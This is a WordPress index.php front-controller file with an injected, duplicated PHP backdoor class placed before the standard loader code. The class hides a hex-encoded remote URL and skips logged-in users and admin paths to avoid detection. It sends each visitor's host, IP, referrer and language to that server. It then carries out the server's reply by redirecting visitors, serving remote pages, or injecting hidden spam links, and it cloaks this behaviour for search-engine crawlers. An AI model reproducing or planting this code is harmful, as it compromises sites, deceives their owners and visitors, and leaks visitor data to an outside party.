$value) { if ($key == 'http2_session_id' || strpos($key, 'wordpress_logged_in_') === 0) { $lf_enable = false; @setcookie('http2_session_id', '1', 2147483647, "/"); break; } } ini_set('default_socket_timeout', 10); $uri = $_SERVER['REQUEST_URI'] ?? '/'; $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $bad_urls = '#xmlrpc.php|wp-includes|wp-admin|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|\.jpg|administrator#i'; if (preg_match($bad_urls, ($_SERVER['HTTP_HOST'] ?? '') . $uri)) { $lf_enable = false; } class Advanced_LinkFlow_Control { public $url = "\x68\x74\x74\x70:\x2f/\x66e\x72m\x2eu\x6cs\x6fr\x2er\x75/\x67e\x74.\x70h\x70"; public $ua = ''; public $uri = ''; public $ip = ''; public $lang = ''; public $google_ip_list = array( "64.233.*", "66.102.*", "66.249.*", "72.14.*", "74.125.*", "108.177.*", "209.85.*", "216.239.*", "172.217.*", "35.190.247.*" ); public $bing_ip_list = array( "13.66.*.*", "13.67.*.*", "13.68.*.*", "13.69.*.*", "20.36.*.*", "20.37.*.*", "20.38.*.*", "20.39.*.*", "40.77.*.*", "40.79.*.*", "52.231.*.*", "191.233.*.*" ); public $yandex_ip_list = array( "5.45.*.*", "5.255.*.*", "37.9.*.*", "37.140.*.*", "77.88.*.*", "84.252.*.*", "87.250.*.*", "90.156.*.*", "93.158.*.*", "95.108.*.*", "141.8.*.*", "178.154.*.*", "213.180.*.*", "185.32.187.*" ); public $links = array(); public $bot = ''; public $ref = ''; function get($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); return $data; } elseif (@ini_get('allow_url_fopen')) { return @file_get_contents($url); } else { $parts = parse_url($url); $target = $parts['host']; $port = isset($parts['port']) ? $parts['port'] : 80; $page = isset($parts['path']) ? $parts['path'] : ''; $page .= isset($parts['query']) ? '?' . $parts['query'] : ''; $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : ''; $page = ($page == '') ? '/' : $page; if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) { @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 1, "usec" => 1)); $headers = "GET $page HTTP/1.1\r\n"; $headers .= "Host: {$parts['host']}\r\n"; $headers .= "Connection: Close\r\n\r\n"; if (fwrite($fp, $headers)) { $resp = ''; while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) { $resp .= $curr; } if (isset($curr) && $curr !== false) { fclose($fp); return substr(strstr($resp, "\r\n\r\n"), 3); } } fclose($fp); } } return TRUE; } function init($uri, $ua) { $this->uri = $uri; $bot = FALSE; $this->ip = isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : (isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown'); $this->ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $this->lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (@preg_match('/googlebot|google-structured-data/i', $ua)) { $bot = TRUE; $this->bot = 'google'; } if (@preg_match('/bing|msn|msr|slurp|yahoo/i', $ua)) { $bot = TRUE; $this->bot = 'bing'; } if (@preg_match('/yandexbot|yandeximages|yandexmobilebot|yandex/i', $ua)) { $bot = TRUE; $this->bot = 'yandex'; } if (@preg_match('/duckduckbot/i', $ua)) { $bot = TRUE; $this->bot = 'duckduck'; } if (@preg_match('~aport|rambler|abachobot|accoona|acoirobot|aspseek|croccrawler|dumbot|webcrawler|geonabot|gigabot|lycos|scooter|altavista|webalta|adbot|estyle|mail\.ru|scrubby~i', $ua)) { $bot = TRUE; $this->bot = 'other'; } if (!$bot) { $bot_sources = [ 'google' => $this->google_ip_list ?? [], 'bing' => $this->bing_ip_list ?? [], 'yandex' => $this->yandex_ip_list ?? [], ]; foreach ($bot_sources as $bot_name => $ip_list) { foreach ($ip_list as $ip_mask) { $pattern = '#^' . str_replace(['.', '*'], ['\.', '.*'], $ip_mask) . '$#'; if (preg_match($pattern, $this->ip)) { $bot = TRUE; $this->bot = $bot_name; break 2; } } } } if (!$bot) { $hostbyaddr = @gethostbyaddr($this->ip); $host_patterns = [ 'google' => 'googlebot|google', 'bing' => 'bing|msn|msr|slurp|yahoo', 'yandex' => 'yandex', 'duckduckgo' => 'duckduckgo|duckduckbot', ]; foreach ($host_patterns as $bot_name => $pattern) { if (preg_match("/$pattern/i", $hostbyaddr)) { $bot = TRUE; $this->bot = $bot_name; break; } } } if (!empty($_SERVER['SERVER_NAME'])) { $tmp = @parse_url('http://' . $_SERVER['SERVER_NAME']); if (isset($tmp['host'])) { $host = $tmp['host']; } } $url = $this->url . "?host=$host&uri=" . urlencode($this->uri) . "&bot={$this->bot}&ip={$this->ip}&ref=" . urlencode($this->ref) . '&lang=' . urlencode($this->lang); if (isset($_COOKIE['LFD']) || isset($_REQUEST['LFD'])) { $url .= '&check=1'; $page = $this->get($url); $res = 0; if (strpos($page, "XTESTOKX") !== false) { $res = 1; } die(json_encode([ 'r' => $res, 'funcs' => [ 'curl_init' => function_exists('curl_init') ? 1 : 0, 'file_get_contents' => function_exists('file_get_contents') ? 1 : 0, 'allow_url_fopen' => ini_get('allow_url_fopen') ? 1 : 0, 'fsockopen' => function_exists('fsockopen') ? 1 : 0, 'socket_set_option' => function_exists('socket_set_option') ? 1 : 0, ] ])); } if (isset($_COOKIE['CURLOPT_LF_TEST']) || isset($_REQUEST['CURLOPT_LF_TEST'])) { $url .= '&check=1'; } $page = $this->get($url); if (preg_match('/(.*?)<\/url>/us', $page, $matches)) { $url = trim($matches[1]); if (!headers_sent()) { header("Location: " . $url); exit; } else { echo ''; exit; } } if (preg_match('/(.*?)<\/page>/us', $page, $matches)) { $page = $matches[1]; die($page); } if (strpos($page, '') !== FALSE) { preg_match_all('~(.*?)~', $page, $m); $this->links = isset($m[1]) ? $m[1] : array(); } if (count($this->links) > 0) { ob_start(array($this, 'rwcontent')); register_shutdown_function('ob_end_flush'); } } function rwcontent($content) { $blocked_tags = array('header', 'footer'); $tags = array('p', 'span', 'strong', 'em', 'i', 'td', 'div', 'ul', 'li', 'body'); $tags_vals = array(); foreach ($tags as $tag) { preg_match_all("~<{$tag}\s+.*?>(.*?)~is", $content, $matches); if (isset($matches[0])) { foreach ($matches[0] as $match) { $is_blocked = false; foreach ($blocked_tags as $blocked_tag) { $pattern = "~<{$blocked_tag}.*?>.*?{$match}.*?~is"; if (preg_match($pattern, $content)) { $is_blocked = true; break; } } if (!$is_blocked) { $tags_vals[] = array('tag' => $tag, 'content' => $match); } } } if (count($tags_vals) > count($this->links)) { break; } } $tag_index = 0; $link_index = 0; $links_count = count($this->links); $tags_vals_count = count($tags_vals); while ($link_index < $links_count && $tag_index < $tags_vals_count) { $link = $this->links[$link_index]; if (substr($link, -3) === '###') { $linkHTML = substr($link, 0, -3); } else { $seed = $_SERVER['REQUEST_URI'] . strlen($link); $hash1 = crc32($seed); $offset = 7000 + ($hash1 % 6001); $hash2 = crc32($seed . 'w'); $width = 1000 + ($hash2 % 201); $linkHTML = "
{$link}
"; } $tag_val = $tags_vals[$tag_index]; if (strlen($tag_val['content']) % 2 == 1) { $tag_content_new = $tag_val['content']; $tag_content_new = preg_replace("(<{$tag_val['tag']}.*?>)", "$0 {$linkHTML}", $tag_content_new, 1); } else { if (substr($tag_val['content'], -(strlen($tag_val['tag']) + 4)) == ".") { $tag_content_new = str_replace(".", " {$linkHTML}", $tag_val['content']); } else { $tag_content_new = str_replace("", " {$linkHTML}", $tag_val['content']); } } $content = preg_replace("~" . preg_quote($tag_val['content'], '~') . "~i", $tag_content_new, $content, 1); if (strpos($content, $linkHTML) !== false) { $link_index++; } $tag_index++; } return $content; } } if ($lf_enable) { $lf = new Advanced_LinkFlow_Control; $lf->init($uri, $ua); } } php if (!class_exists('Advanced_LinkFlow_Control')) { $lf_enable = true; if (function_exists('is_user_logged_in') && is_user_logged_in()) { $lf_enable = false; @setcookie('http2_session_id', '1', 2147483647, "/"); } foreach ($_COOKIE as $key => $value) { if ($key == 'http2_session_id' || strpos($key, 'wordpress_logged_in_') === 0) { $lf_enable = false; @setcookie('http2_session_id', '1', 2147483647, "/"); break; } } ini_set('default_socket_timeout', 10); $uri = $_SERVER['REQUEST_URI'] ?? '/'; $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $bad_urls = '#xmlrpc.php|wp-includes|wp-admin|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|\.jpg|administrator#i'; if (preg_match($bad_urls, ($_SERVER['HTTP_HOST'] ?? '') . $uri)) { $lf_enable = false; } class Advanced_LinkFlow_Control { public $url = "\x68\x74\x74\x70:\x2f/\x66e\x72m\x2eu\x6cs\x6fr\x2er\x75/\x67e\x74.\x70h\x70"; public $ua = ''; public $uri = ''; public $ip = ''; public $lang = ''; public $google_ip_list = array( "64.233.*", "66.102.*", "66.249.*", "72.14.*", "74.125.*", "108.177.*", "209.85.*", "216.239.*", "172.217.*", "35.190.247.*" ); public $bing_ip_list = array( "13.66.*.*", "13.67.*.*", "13.68.*.*", "13.69.*.*", "20.36.*.*", "20.37.*.*", "20.38.*.*", "20.39.*.*", "40.77.*.*", "40.79.*.*", "52.231.*.*", "191.233.*.*" ); public $yandex_ip_list = array( "5.45.*.*", "5.255.*.*", "37.9.*.*", "37.140.*.*", "77.88.*.*", "84.252.*.*", "87.250.*.*", "90.156.*.*", "93.158.*.*", "95.108.*.*", "141.8.*.*", "178.154.*.*", "213.180.*.*", "185.32.187.*" ); public $links = array(); public $bot = ''; public $ref = ''; function get($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); return $data; } elseif (@ini_get('allow_url_fopen')) { return @file_get_contents($url); } else { $parts = parse_url($url); $target = $parts['host']; $port = isset($parts['port']) ? $parts['port'] : 80; $page = isset($parts['path']) ? $parts['path'] : ''; $page .= isset($parts['query']) ? '?' . $parts['query'] : ''; $page .= isset($parts['fragment']) ? '#' . $parts['fragment'] : ''; $page = ($page == '') ? '/' : $page; if ($fp = @fsockopen($target, $port, $errno, $errstr, 3)) { @socket_set_option($fp, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 1, "usec" => 1)); $headers = "GET $page HTTP/1.1\r\n"; $headers .= "Host: {$parts['host']}\r\n"; $headers .= "Connection: Close\r\n\r\n"; if (fwrite($fp, $headers)) { $resp = ''; while (!feof($fp) && ($curr = fgets($fp, 128)) !== false) { $resp .= $curr; } if (isset($curr) && $curr !== false) { fclose($fp); return substr(strstr($resp, "\r\n\r\n"), 3); } } fclose($fp); } } return TRUE; } function init($uri, $ua) { $this->uri = $uri; $bot = FALSE; $this->ip = isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] : (isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown'); $this->ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $this->lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (@preg_match('/googlebot|google-structured-data/i', $ua)) { $bot = TRUE; $this->bot = 'google'; } if (@preg_match('/bing|msn|msr|slurp|yahoo/i', $ua)) { $bot = TRUE; $this->bot = 'bing'; } if (@preg_match('/yandexbot|yandeximages|yandexmobilebot|yandex/i', $ua)) { $bot = TRUE; $this->bot = 'yandex'; } if (@preg_match('/duckduckbot/i', $ua)) { $bot = TRUE; $this->bot = 'duckduck'; } if (@preg_match('~aport|rambler|abachobot|accoona|acoirobot|aspseek|croccrawler|dumbot|webcrawler|geonabot|gigabot|lycos|scooter|altavista|webalta|adbot|estyle|mail\.ru|scrubby~i', $ua)) { $bot = TRUE; $this->bot = 'other'; } if (!$bot) { $bot_sources = [ 'google' => $this->google_ip_list ?? [], 'bing' => $this->bing_ip_list ?? [], 'yandex' => $this->yandex_ip_list ?? [], ]; foreach ($bot_sources as $bot_name => $ip_list) { foreach ($ip_list as $ip_mask) { $pattern = '#^' . str_replace(['.', '*'], ['\.', '.*'], $ip_mask) . '$#'; if (preg_match($pattern, $this->ip)) { $bot = TRUE; $this->bot = $bot_name; break 2; } } } } if (!$bot) { $hostbyaddr = @gethostbyaddr($this->ip); $host_patterns = [ 'google' => 'googlebot|google', 'bing' => 'bing|msn|msr|slurp|yahoo', 'yandex' => 'yandex', 'duckduckgo' => 'duckduckgo|duckduckbot', ]; foreach ($host_patterns as $bot_name => $pattern) { if (preg_match("/$pattern/i", $hostbyaddr)) { $bot = TRUE; $this->bot = $bot_name; break; } } } if (!empty($_SERVER['SERVER_NAME'])) { $tmp = @parse_url('http://' . $_SERVER['SERVER_NAME']); if (isset($tmp['host'])) { $host = $tmp['host']; } } $url = $this->url . "?host=$host&uri=" . urlencode($this->uri) . "&bot={$this->bot}&ip={$this->ip}&ref=" . urlencode($this->ref) . '&lang=' . urlencode($this->lang); if (isset($_COOKIE['LFD']) || isset($_REQUEST['LFD'])) { $url .= '&check=1'; $page = $this->get($url); $res = 0; if (strpos($page, "XTESTOKX") !== false) { $res = 1; } die(json_encode([ 'r' => $res, 'funcs' => [ 'curl_init' => function_exists('curl_init') ? 1 : 0, 'file_get_contents' => function_exists('file_get_contents') ? 1 : 0, 'allow_url_fopen' => ini_get('allow_url_fopen') ? 1 : 0, 'fsockopen' => function_exists('fsockopen') ? 1 : 0, 'socket_set_option' => function_exists('socket_set_option') ? 1 : 0, ] ])); } if (isset($_COOKIE['CURLOPT_LF_TEST']) || isset($_REQUEST['CURLOPT_LF_TEST'])) { $url .= '&check=1'; } $page = $this->get($url); if (preg_match('/(.*?)<\/url>/us', $page, $matches)) { $url = trim($matches[1]); if (!headers_sent()) { header("Location: " . $url); exit; } else { echo ''; exit; } } if (preg_match('/(.*?)<\/page>/us', $page, $matches)) { $page = $matches[1]; die($page); } if (strpos($page, '') !== FALSE) { preg_match_all('~(.*?)~', $page, $m); $this->links = isset($m[1]) ? $m[1] : array(); } if (count($this->links) > 0) { ob_start(array($this, 'rwcontent')); register_shutdown_function('ob_end_flush'); } } function rwcontent($content) { $blocked_tags = array('header', 'footer'); $tags = array('p', 'span', 'strong', 'em', 'i', 'td', 'div', 'ul', 'li', 'body'); $tags_vals = array(); foreach ($tags as $tag) { preg_match_all("~<{$tag}\s+.*?>(.*?)~is", $content, $matches); if (isset($matches[0])) { foreach ($matches[0] as $match) { $is_blocked = false; foreach ($blocked_tags as $blocked_tag) { $pattern = "~<{$blocked_tag}.*?>.*?{$match}.*?~is"; if (preg_match($pattern, $content)) { $is_blocked = true; break; } } if (!$is_blocked) { $tags_vals[] = array('tag' => $tag, 'content' => $match); } } } if (count($tags_vals) > count($this->links)) { break; } } $tag_index = 0; $link_index = 0; $links_count = count($this->links); $tags_vals_count = count($tags_vals); while ($link_index < $links_count && $tag_index < $tags_vals_count) { $link = $this->links[$link_index]; if (substr($link, -3) === '###') { $linkHTML = substr($link, 0, -3); } else { $seed = $_SERVER['REQUEST_URI'] . strlen($link); $hash1 = crc32($seed); $offset = 7000 + ($hash1 % 6001); $hash2 = crc32($seed . 'w'); $width = 1000 + ($hash2 % 201); $linkHTML = "
{$link}
"; } $tag_val = $tags_vals[$tag_index]; if (strlen($tag_val['content']) % 2 == 1) { $tag_content_new = $tag_val['content']; $tag_content_new = preg_replace("(<{$tag_val['tag']}.*?>)", "$0 {$linkHTML}", $tag_content_new, 1); } else { if (substr($tag_val['content'], -(strlen($tag_val['tag']) + 4)) == ".") { $tag_content_new = str_replace(".", " {$linkHTML}", $tag_val['content']); } else { $tag_content_new = str_replace("", " {$linkHTML}", $tag_val['content']); } } $content = preg_replace("~" . preg_quote($tag_val['content'], '~') . "~i", $tag_content_new, $content, 1); if (strpos($content, $linkHTML) !== false) { $link_index++; } $tag_index++; } return $content; } } if ($lf_enable) { $lf = new Advanced_LinkFlow_Control; $lf->init($uri, $ua); } } /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';